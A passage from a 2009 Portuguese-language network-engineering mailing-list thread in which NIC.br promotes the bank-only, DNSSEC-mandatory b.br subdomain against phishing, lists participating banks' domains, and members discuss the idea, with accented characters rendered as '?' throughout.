do Nordeste do Brasil S/A > Banco Industrial e Comercial S/A > Banco Panamericano S/A > Banco Prosper S/A > Banco Safra S/A > Banco Schahin S/A > Banco Triangulo S/A > Banco Votorantim S/A > Banrisul - Banco do Estado do Rio Grande do Sul > Caixa Econ?mica Federal > Paran? Banco S/A > Unibanco * > alfa.b.br > alfanet.b.br > bancoalfa.b.br > > bahiabank.b.br > bancobbm.b.br > bbmbank.b.br > bbminvestimentos.b.br > > bancobonsucesso.b.br > > bradesco.b.br > todasasrazoes.b.br > bancobradesco.b.br > bradescobbi.b.br > bradescocambio.b.br > bradescocartoes.b.br > bradescocomercioeletronico.b.br < > http://www.bradescocomercioeletronico.b.br> > bradescocorporate.b.br > bradescoempresas.b.br > bradescopessoajuridica.b.br > bradescoprime.b.br > bradescoprivate.b.br > bradescori.b.br > bradescouniversitarios.b.br > bradescoseguranca.b.br > bradescopoderpublico.b.br > bradesconikkei.b.br > bancodoplaneta.b.br > bradescorural.b.br > bancoalvorada.b.br > bancobcn.b.br > bancobbi.b.br > bancofinasa.b.br > bbi.b.br > bcn.b.br > bancobmc.b.br > bankpar.b.br > bancoboavista.b.br > bancofinasabmc.b.br > boavista.b.br > bancobradescobbi.b.br > bmc.b.br > bancobankpar.b.br > baneb.b.br > bradescosaude.b.br > bradescoseguros.b.br > 2000e9.b.br > 2000e9bradesco.b.br > 2000enove.b.br > 2000enovebradesco.b.br > 2000i9.b.br > 2000i9bradesco.b.br > 2000inove.b.br > 2000inovebradesco.b.br > bradesco2000e9.b.br > bradesco2000enove.b.br > bradesco2000i9.b.br > bradesco2000inove.b.br > bradescodoismilenove.b.br > bradescodoismilinove.b.br > bradescoinove.b.br > doismilenovebradesco.b.br > doismilinovebradesco.b.br > bradescomediacenter.b.br > bradescopocket.b.br > bradescovidaeprevidencia.b.br > clickconta.b.b > corporatebradesco.b.br > fb.b.br > shopcredit.b.br > shopfacil.b.br > shopinvest.b.br > > alvorada.b.br > bradescocapitalizacao.b.br > bradescocelular.b.br > bradescoimoveis.b.br > bradescocustodia.b.br > bradescoconsorcio.b.br > bradescoprevidencia.b.br > bradespar.b.br > finasaesportes.b.br > cidadetran.b.br > finasa.b.br > economiaemdia.b.br > bradesconetexpress.b.br > bradescorsa.b.br > > bancobci.b.br > bancobva.b.br > bancoconceito.b.br > bancomultiner.b.br > bancosolidez.b.br > bancovalor.b.br > bancovetor.b.br > bancovitoria.b.br > bvadireto.b.br > cdbmais.b.br > cdbseguro.b.br > descontonline.b.br > finameexpress.b.br > finamexpress.b.br > fixseguro.b.br > moneyshopping.b.br > multiaplic.b.br > multicdb.b.br > multicredito.b.br > ndigi.b.br > negociosdigitais.b.br > pegcred.b.br > pegcredito.b.br > peguecred.b.br > peguecredito.b.br > > sicredi.b.br > > bancobrasil.b.br > bancodobrasil.b.br > bb.b.br > > banparanet.b.br > > itau.b.br > > bnb.b.br > > bicbanco.b.br > > bancopanamericano.b.br > panamericano.b.br > > bancoprosper.b.br > prosper.b.br > > safra.b.br > > schahin.b.br > bancoschahin.b.br > > bancotriangulo.b.br > tribanco.b.br > tribanconline.b.br > tribancoonline.b.br > > bancovotorantim.b.br > > banrisul.b.br > > bankingcaixa.b.br > caixaeconomica.b.br > caixaeconomicafederal.b.br > cef.b.br > fgts.b.br > caixa.b.br > > paranabanco.b.br > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From demi at nic.br Wed Jun 10 16:00:53 2009 From: demi at nic.br (Demi Getschko) Date: Wed, 10 Jun 2009 16:00:53 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> Message-ID: <4A3002E5.5090009@nic.br> O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: 1- s? bancos moram l?; 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso testado quando ingressaram no sub-dom?nio); Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar algu?m ? confus?o com a tal "engenharia social"... abra?o demi Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... Emiliano Martins wrote: > Demi, > Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves do > com.br? > > > > 2009/6/10 Demi Getschko > > >> Prezados >> >> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco >> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >> dificilmente veremos campanha de marquetim falando nisso (at? pelos valores >> investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o >> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? >> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do >> banco com o b.br, sempre que ele existir... >> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >> alfab?tica. A lista dos dom?nios completa est? em: >> http://www.nic.br/atividades/dom-bbr.htm >> >> *Banco Alfa S/A >> Banco BBM S/A >> Banco Bonsucesso S/A >> Banco Bradesco S/A >> Banco Bradesco BBI S/A >> Banco BVA S/A >> Banco Cooperativo Sicredi S/A - BANSICREDI >> Banco do Brasil S/A >> Banco do Estado do Par? S/A >> Banco Ita? S/A >> Banco do Nordeste do Brasil S/A >> Banco Industrial e Comercial S/A >> Banco Panamericano S/A >> Banco Prosper S/A >> Banco Safra S/A >> Banco Schahin S/A >> Banco Triangulo S/A >> Banco Votorantim S/A >> Banrisul - Banco do Estado do Rio Grande do Sul >> Caixa Econ?mica Federal >> Paran? Banco S/A >> Unibanco * >> alfa.b.br >> alfanet.b.br >> bancoalfa.b.br >> >> bahiabank.b.br >> bancobbm.b.br >> bbmbank.b.br >> bbminvestimentos.b.br >> >> bancobonsucesso.b.br >> >> bradesco.b.br >> todasasrazoes.b.br >> bancobradesco.b.br >> bradescobbi.b.br >> bradescocambio.b.br >> bradescocartoes.b.br >> bradescocomercioeletronico.b.br < >> http://www.bradescocomercioeletronico.b.br> >> bradescocorporate.b.br >> bradescoempresas.b.br >> bradescopessoajuridica.b.br >> bradescoprime.b.br >> bradescoprivate.b.br >> bradescori.b.br >> bradescouniversitarios.b.br >> bradescoseguranca.b.br >> bradescopoderpublico.b.br >> bradesconikkei.b.br >> bancodoplaneta.b.br >> bradescorural.b.br >> bancoalvorada.b.br >> bancobcn.b.br >> bancobbi.b.br >> bancofinasa.b.br >> bbi.b.br >> bcn.b.br >> bancobmc.b.br >> bankpar.b.br >> bancoboavista.b.br >> bancofinasabmc.b.br >> boavista.b.br >> bancobradescobbi.b.br >> bmc.b.br >> bancobankpar.b.br >> baneb.b.br >> bradescosaude.b.br >> bradescoseguros.b.br >> 2000e9.b.br >> 2000e9bradesco.b.br >> 2000enove.b.br >> 2000enovebradesco.b.br >> 2000i9.b.br >> 2000i9bradesco.b.br >> 2000inove.b.br >> 2000inovebradesco.b.br >> bradesco2000e9.b.br >> bradesco2000enove.b.br >> bradesco2000i9.b.br >> bradesco2000inove.b.br >> bradescodoismilenove.b.br >> bradescodoismilinove.b.br >> bradescoinove.b.br >> doismilenovebradesco.b.br >> doismilinovebradesco.b.br >> bradescomediacenter.b.br >> bradescopocket.b.br >> bradescovidaeprevidencia.b.br >> clickconta.b.b >> corporatebradesco.b.br >> fb.b.br >> shopcredit.b.br >> shopfacil.b.br >> shopinvest.b.br >> >> alvorada.b.br >> bradescocapitalizacao.b.br >> bradescocelular.b.br >> bradescoimoveis.b.br >> bradescocustodia.b.br >> bradescoconsorcio.b.br >> bradescoprevidencia.b.br >> bradespar.b.br >> finasaesportes.b.br >> cidadetran.b.br >> finasa.b.br >> economiaemdia.b.br >> bradesconetexpress.b.br >> bradescorsa.b.br >> >> bancobci.b.br >> bancobva.b.br >> bancoconceito.b.br >> bancomultiner.b.br >> bancosolidez.b.br >> bancovalor.b.br >> bancovetor.b.br >> bancovitoria.b.br >> bvadireto.b.br >> cdbmais.b.br >> cdbseguro.b.br >> descontonline.b.br >> finameexpress.b.br >> finamexpress.b.br >> fixseguro.b.br >> moneyshopping.b.br >> multiaplic.b.br >> multicdb.b.br >> multicredito.b.br >> ndigi.b.br >> negociosdigitais.b.br >> pegcred.b.br >> pegcredito.b.br >> peguecred.b.br >> peguecredito.b.br >> >> sicredi.b.br >> >> bancobrasil.b.br >> bancodobrasil.b.br >> bb.b.br >> >> banparanet.b.br >> >> itau.b.br >> >> bnb.b.br >> >> bicbanco.b.br >> >> bancopanamericano.b.br >> panamericano.b.br >> >> bancoprosper.b.br >> prosper.b.br >> >> safra.b.br >> >> schahin.b.br >> bancoschahin.b.br >> >> bancotriangulo.b.br >> tribanco.b.br >> tribanconline.b.br >> tribancoonline.b.br >> >> bancovotorantim.b.br >> >> banrisul.b.br >> >> bankingcaixa.b.br >> caixaeconomica.b.br >> caixaeconomicafederal.b.br >> cef.b.br >> fgts.b.br >> caixa.b.br >> >> paranabanco.b.br >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > From cleber-listas at inetweb.com.br Wed Jun 10 15:55:32 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Wed, 10 Jun 2009 15:55:32 -0300 Subject: [GTER] RES: b.br - meio "off topic"... In-Reply-To: <4A2FFF1C.1010409@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> Message-ID: Demi, Estamos contigo! Inclusive, temos uma mailing mensal na qual enviamos ? nossos clientes com novidades da empresa e algumas dicas e iremos incluir esta informa??o no proximo mailing. Abra?os, Cleber Saad -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Demi Getschko Enviada em: quarta-feira, 10 de junho de 2009 15:45 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] b.br - meio "off topic"... Prezados Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como dificilmente veremos campanha de marquetim falando nisso (at? pelos valores investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do banco com o b.br, sempre que ele existir... Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem alfab?tica. A lista dos dom?nios completa est? em: http://www.nic.br/atividades/dom-bbr.htm *Banco Alfa S/A Banco BBM S/A Banco Bonsucesso S/A Banco Bradesco S/A Banco Bradesco BBI S/A Banco BVA S/A Banco Cooperativo Sicredi S/A - BANSICREDI Banco do Brasil S/A Banco do Estado do Par? S/A Banco Ita? S/A Banco do Nordeste do Brasil S/A Banco Industrial e Comercial S/A Banco Panamericano S/A Banco Prosper S/A Banco Safra S/A Banco Schahin S/A Banco Triangulo S/A Banco Votorantim S/A Banrisul - Banco do Estado do Rio Grande do Sul Caixa Econ?mica Federal Paran? Banco S/A Unibanco * alfa.b.br alfanet.b.br bancoalfa.b.br bahiabank.b.br bancobbm.b.br bbmbank.b.br bbminvestimentos.b.br bancobonsucesso.b.br bradesco.b.br todasasrazoes.b.br bancobradesco.b.br bradescobbi.b.br bradescocambio.b.br bradescocartoes.b.br bradescocomercioeletronico.b.br bradescocorporate.b.br bradescoempresas.b.br bradescopessoajuridica.b.br bradescoprime.b.br bradescoprivate.b.br bradescori.b.br bradescouniversitarios.b.br bradescoseguranca.b.br bradescopoderpublico.b.br bradesconikkei.b.br bancodoplaneta.b.br bradescorural.b.br bancoalvorada.b.br bancobcn.b.br bancobbi.b.br bancofinasa.b.br bbi.b.br bcn.b.br bancobmc.b.br bankpar.b.br bancoboavista.b.br bancofinasabmc.b.br boavista.b.br bancobradescobbi.b.br bmc.b.br bancobankpar.b.br baneb.b.br bradescosaude.b.br bradescoseguros.b.br 2000e9.b.br 2000e9bradesco.b.br 2000enove.b.br 2000enovebradesco.b.br 2000i9.b.br 2000i9bradesco.b.br 2000inove.b.br 2000inovebradesco.b.br bradesco2000e9.b.br bradesco2000enove.b.br bradesco2000i9.b.br bradesco2000inove.b.br bradescodoismilenove.b.br bradescodoismilinove.b.br bradescoinove.b.br doismilenovebradesco.b.br doismilinovebradesco.b.br bradescomediacenter.b.br bradescopocket.b.br bradescovidaeprevidencia.b.br clickconta.b.b corporatebradesco.b.br fb.b.br shopcredit.b.br shopfacil.b.br shopinvest.b.br alvorada.b.br bradescocapitalizacao.b.br bradescocelular.b.br bradescoimoveis.b.br bradescocustodia.b.br bradescoconsorcio.b.br bradescoprevidencia.b.br bradespar.b.br finasaesportes.b.br cidadetran.b.br finasa.b.br economiaemdia.b.br bradesconetexpress.b.br bradescorsa.b.br bancobci.b.br bancobva.b.br bancoconceito.b.br bancomultiner.b.br bancosolidez.b.br bancovalor.b.br bancovetor.b.br bancovitoria.b.br bvadireto.b.br cdbmais.b.br cdbseguro.b.br descontonline.b.br finameexpress.b.br finamexpress.b.br fixseguro.b.br moneyshopping.b.br multiaplic.b.br multicdb.b.br multicredito.b.br ndigi.b.br negociosdigitais.b.br pegcred.b.br pegcredito.b.br peguecred.b.br peguecredito.b.br sicredi.b.br bancobrasil.b.br bancodobrasil.b.br bb.b.br banparanet.b.br itau.b.br bnb.b.br bicbanco.b.br bancopanamericano.b.br panamericano.b.br bancoprosper.b.br prosper.b.br safra.b.br schahin.b.br bancoschahin.b.br bancotriangulo.b.br tribanco.b.br tribanconline.b.br tribancoonline.b.br bancovotorantim.b.br banrisul.b.br bankingcaixa.b.br caixaeconomica.b.br caixaeconomicafederal.b.br cef.b.br fgts.b.br caixa.b.br paranabanco.b.br -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.61/2167 - Data de Lan?amento: 06/10/09 05:52:00 From emiliano.martins at ik1.com.br Wed Jun 10 16:20:16 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Wed, 10 Jun 2009 16:20:16 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A3002E5.5090009@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> <4A3002E5.5090009@nic.br> Message-ID: <9c0c824e0906101220t56f0ae30nda1e5b88e03fd96d@mail.gmail.com> Demi, Muito obrigado pela explica??o. Muito importante essa iniciativa. Com certeza irei divulgar. 2009/6/10 Demi Getschko > O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: > 1- s? bancos moram l?; > 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso > testado quando ingressaram no sub-dom?nio); > Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a crer > que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na origem) > garantindo a tradu??o de nomes para n?meros. (No com.br, os bancos est?o > imersos em 1.6 milh?es de nomes e ? f?cil tentar levar algu?m ? confus?o com > a tal "engenharia social"... > abra?o > demi > Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do > judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... > > > > > > Emiliano Martins wrote: > >> Demi, >> Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves >> do >> com.br? >> >> >> >> 2009/6/10 Demi Getschko >> >> >> >>> Prezados >>> >>> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >>> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >>> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do >>> banco >>> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >>> dificilmente veremos campanha de marquetim falando nisso (at? pelos >>> valores >>> investidos na divulga??o do com.br), uma id?ia ? come?armos uma >>> divulga??o >>> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, >>> ? >>> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio >>> do >>> banco com o b.br, sempre que ele existir... >>> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >>> alfab?tica. A lista dos dom?nios completa est? em: >>> http://www.nic.br/atividades/dom-bbr.htm >>> >>> *Banco Alfa S/A >>> Banco BBM S/A >>> Banco Bonsucesso S/A >>> Banco Bradesco S/A >>> Banco Bradesco BBI S/A >>> Banco BVA S/A >>> Banco Cooperativo Sicredi S/A - BANSICREDI >>> Banco do Brasil S/A >>> Banco do Estado do Par? S/A >>> Banco Ita? S/A >>> Banco do Nordeste do Brasil S/A >>> Banco Industrial e Comercial S/A >>> Banco Panamericano S/A >>> Banco Prosper S/A >>> Banco Safra S/A >>> Banco Schahin S/A >>> Banco Triangulo S/A >>> Banco Votorantim S/A >>> Banrisul - Banco do Estado do Rio Grande do Sul >>> Caixa Econ?mica Federal >>> Paran? Banco S/A >>> Unibanco * >>> alfa.b.br >>> alfanet.b.br >>> bancoalfa.b.br >>> >>> bahiabank.b.br >>> bancobbm.b.br >>> bbmbank.b.br >>> bbminvestimentos.b.br >>> >>> bancobonsucesso.b.br >>> >>> bradesco.b.br >>> todasasrazoes.b.br >>> bancobradesco.b.br >>> bradescobbi.b.br >>> bradescocambio.b.br >>> bradescocartoes.b.br >>> bradescocomercioeletronico.b.br < >>> http://www.bradescocomercioeletronico.b.br> >>> bradescocorporate.b.br >>> bradescoempresas.b.br >>> bradescopessoajuridica.b.br >>> bradescoprime.b.br >>> bradescoprivate.b.br >>> bradescori.b.br >>> bradescouniversitarios.b.br >>> bradescoseguranca.b.br >>> bradescopoderpublico.b.br >>> bradesconikkei.b.br >>> bancodoplaneta.b.br >>> bradescorural.b.br >>> bancoalvorada.b.br >>> bancobcn.b.br >>> bancobbi.b.br >>> bancofinasa.b.br >>> bbi.b.br >>> bcn.b.br >>> bancobmc.b.br >>> bankpar.b.br >>> bancoboavista.b.br >>> bancofinasabmc.b.br >>> boavista.b.br >>> bancobradescobbi.b.br >>> bmc.b.br >>> bancobankpar.b.br >>> baneb.b.br >>> bradescosaude.b.br >>> bradescoseguros.b.br >>> 2000e9.b.br >>> 2000e9bradesco.b.br >>> 2000enove.b.br >>> 2000enovebradesco.b.br >>> 2000i9.b.br >>> 2000i9bradesco.b.br >>> 2000inove.b.br >>> 2000inovebradesco.b.br >>> bradesco2000e9.b.br >>> bradesco2000enove.b.br >>> bradesco2000i9.b.br >>> bradesco2000inove.b.br >>> bradescodoismilenove.b.br >>> bradescodoismilinove.b.br >>> bradescoinove.b.br >>> doismilenovebradesco.b.br >>> doismilinovebradesco.b.br >>> bradescomediacenter.b.br >>> bradescopocket.b.br >>> bradescovidaeprevidencia.b.br >>> clickconta.b.b >>> corporatebradesco.b.br >>> fb.b.br >>> shopcredit.b.br >>> shopfacil.b.br >>> shopinvest.b.br >>> >>> alvorada.b.br >>> bradescocapitalizacao.b.br >>> bradescocelular.b.br >>> bradescoimoveis.b.br >>> bradescocustodia.b.br >>> bradescoconsorcio.b.br >>> bradescoprevidencia.b.br >>> bradespar.b.br >>> finasaesportes.b.br >>> cidadetran.b.br >>> finasa.b.br >>> economiaemdia.b.br >>> bradesconetexpress.b.br >>> bradescorsa.b.br >>> >>> bancobci.b.br >>> bancobva.b.br >>> bancoconceito.b.br >>> bancomultiner.b.br >>> bancosolidez.b.br >>> bancovalor.b.br >>> bancovetor.b.br >>> bancovitoria.b.br >>> bvadireto.b.br >>> cdbmais.b.br >>> cdbseguro.b.br >>> descontonline.b.br >>> finameexpress.b.br >>> finamexpress.b.br >>> fixseguro.b.br >>> moneyshopping.b.br >>> multiaplic.b.br >>> multicdb.b.br >>> multicredito.b.br >>> ndigi.b.br >>> negociosdigitais.b.br >>> pegcred.b.br >>> pegcredito.b.br >>> peguecred.b.br >>> peguecredito.b.br >>> >>> sicredi.b.br >>> >>> bancobrasil.b.br >>> bancodobrasil.b.br >>> bb.b.br >>> >>> banparanet.b.br >>> >>> itau.b.br >>> >>> bnb.b.br >>> >>> bicbanco.b.br >>> >>> bancopanamericano.b.br >>> panamericano.b.br >>> >>> bancoprosper.b.br >>> prosper.b.br >>> >>> safra.b.br >>> >>> schahin.b.br >>> bancoschahin.b.br >>> >>> bancotriangulo.b.br >>> tribanco.b.br >>> tribanconline.b.br >>> tribancoonline.b.br >>> >>> bancovotorantim.b.br >>> >>> banrisul.b.br >>> >>> bankingcaixa.b.br >>> caixaeconomica.b.br >>> caixaeconomicafederal.b.br >>> cef.b.br >>> fgts.b.br >>> caixa.b.br >>> >>> paranabanco.b.br >>> >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >>> >> >> >> >> >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From jb at RedePegasus.com.br Wed Jun 10 16:28:21 2009 From: jb at RedePegasus.com.br (JB (Pegasus)) Date: Wed, 10 Jun 2009 16:28:21 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A3002E5.5090009@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> <4A3002E5.5090009@nic.br> Message-ID: <4A300955.3000905@RedePegasus.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 N?o vejo nenhum problema, por aqui em divulgar e recomendar o uso do b.br. Vale lembrar, entretanto e resumindo, face ao meio "off topic": 1. Incompreens?vel porque os bancos n?o incluiram o .com.br no DNSSEC. Salvo haja alguma dificuldade especial, que n?o tenho conhecimento. 2. Alguns .b.br n?o levam a lugar nenhum. (Semelhante ? defini??o de "bakhaul" dado pela Anatel - somente um exemplo equivalente ...) 3. Poucos s?o os bancos de porte, que n?o cravaram no b.br. Por exemplo e, novamente incompreens?vel, o Banco do Brasil. Adicionalmente e mais pr?tico, o Registro.br fazer uma press?o sobre os renitentes ou n?s, enchermos a caixa postal dos respectivos Ouvidores. Pessoalmente, vou passar uma mensagem para o Ouvidor do BB, recomendando-o a agir, at? porque, o BB ? hoje um dos focos mais apreciados pelos caras maus, do que se pode concluir no dia a dia. []s, Juli?o Demi Getschko escreveu: > O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: > 1- s? bancos moram l?; > 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso > testado quando ingressaram no sub-dom?nio); > Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a > crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na > origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os > bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar > algu?m ? confus?o com a tal "engenharia social"... > abra?o > demi > Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do > judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... > > > > > Emiliano Martins wrote: >> Demi, >> Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao >> inves do >> com.br? -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFKMAlVC6YpaEL3LVERApfrAJ9jNk2eKNRPvdsLbAQrh3tjfPfMowCgw0V+ hd5UtXPfKoLZEe4LNx9D7jY= =nH0x -----END PGP SIGNATURE----- From demi at nic.br Wed Jun 10 16:38:58 2009 From: demi at nic.br (Demi Getschko) Date: Wed, 10 Jun 2009 16:38:58 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A300955.3000905@RedePegasus.com.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> <4A3002E5.5090009@nic.br> <4A300955.3000905@RedePegasus.com.br> Message-ID: <4A300BD2.7090607@nic.br> Juli?o, 1- espero que incluam no DNSSEC tamb?m os s?tios sob com.br (? perfeitamente poss?vel e adequado). Mas, mesmo assim, o b.br tem a vantagem de ter a garantia de popula??o espec?fica e a obrigatoriedade de DNSSEC 2- ok, "? vero..." 3- www.bb.b.br existe. Redireciona para bb.com.br, mas existe. Obrigado pela ajuda. demi JB (Pegasus) wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > N?o vejo nenhum problema, por aqui em divulgar e recomendar o uso do > b.br. Vale lembrar, entretanto e resumindo, face ao meio "off topic": > > 1. Incompreens?vel porque os bancos n?o incluiram o .com.br no DNSSEC. > Salvo haja alguma dificuldade especial, que n?o tenho conhecimento. > 2. Alguns .b.br n?o levam a lugar nenhum. (Semelhante ? defini??o de > "bakhaul" dado pela Anatel - somente um exemplo equivalente ...) > 3. Poucos s?o os bancos de porte, que n?o cravaram no b.br. Por exemplo > e, novamente incompreens?vel, o Banco do Brasil. > > Adicionalmente e mais pr?tico, o Registro.br fazer uma press?o sobre os > renitentes ou n?s, enchermos a caixa postal dos respectivos Ouvidores. > Pessoalmente, vou passar uma mensagem para o Ouvidor do BB, > recomendando-o a agir, at? porque, o BB ? hoje um dos focos mais > apreciados pelos caras maus, do que se pode concluir no dia a dia. > > []s, Juli?o > > Demi Getschko escreveu: > >> O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: >> 1- s? bancos moram l?; >> 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso >> testado quando ingressaram no sub-dom?nio); >> Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a >> crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na >> origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os >> bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar >> algu?m ? confus?o com a tal "engenharia social"... >> abra?o >> demi >> Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do >> judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... >> >> >> >> >> Emiliano Martins wrote: >> >>> Demi, >>> Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao >>> inves do >>> com.br? >>> > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.2.2 (MingW32) > Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org > > iD8DBQFKMAlVC6YpaEL3LVERApfrAJ9jNk2eKNRPvdsLbAQrh3tjfPfMowCgw0V+ > hd5UtXPfKoLZEe4LNx9D7jY= > =nH0x > -----END PGP SIGNATURE----- > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gustavo.aguiar at acotel.com Wed Jun 10 16:50:43 2009 From: gustavo.aguiar at acotel.com (Gustavo Aguiar) Date: Wed, 10 Jun 2009 16:50:43 -0300 Subject: [GTER] RES: b.br - meio "off topic"... In-Reply-To: <4A3002E5.5090009@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> <4A3002E5.5090009@nic.br> Message-ID: <015301c9ea04$bda8e0e0$38faa2a0$@aguiar@acotel.com> Bem, vou contribuir questionando meu banco pq ele n?o esta nessa lista! :D E vou divulgar para os amigos... Abs, -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Demi Getschko Enviada em: quarta-feira, 10 de junho de 2009 16:01 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] b.br - meio "off topic"... O b.br ? um subdom?nio espec?fico, com duas regras b?sicas: 1- s? bancos moram l?; 2- todos os que moram l? usam DNSSEC obrigatoriamente (e tiveram isso testado quando ingressaram no sub-dom?nio); Assim ? uma esp?cie de regi?o protegida, onde voc? n?o ser? levado a crer que um s?tio ? um banco quando n?o o ?, e ter? DNSSEC (ao menos na origem) garantindo a tradu??o de nomes para n?meros. (No com.br, os bancos est?o imersos em 1.6 milh?es de nomes e ? f?cil tentar levar algu?m ? confus?o com a tal "engenharia social"... abra?o demi Ps. outro "irm?o" do b.br ? o jus.br, onde apenas institui??es do judici?rio moram, e tamb?m tem DNSSEC obrigat?rio... Emiliano Martins wrote: > Demi, > Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves do > com.br? > > > > 2009/6/10 Demi Getschko > > >> Prezados >> >> Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus >> dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e >> outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco >> assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como >> dificilmente veremos campanha de marquetim falando nisso (at? pelos valores >> investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o >> "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? >> a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do >> banco com o b.br, sempre que ele existir... >> Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem >> alfab?tica. A lista dos dom?nios completa est? em: >> 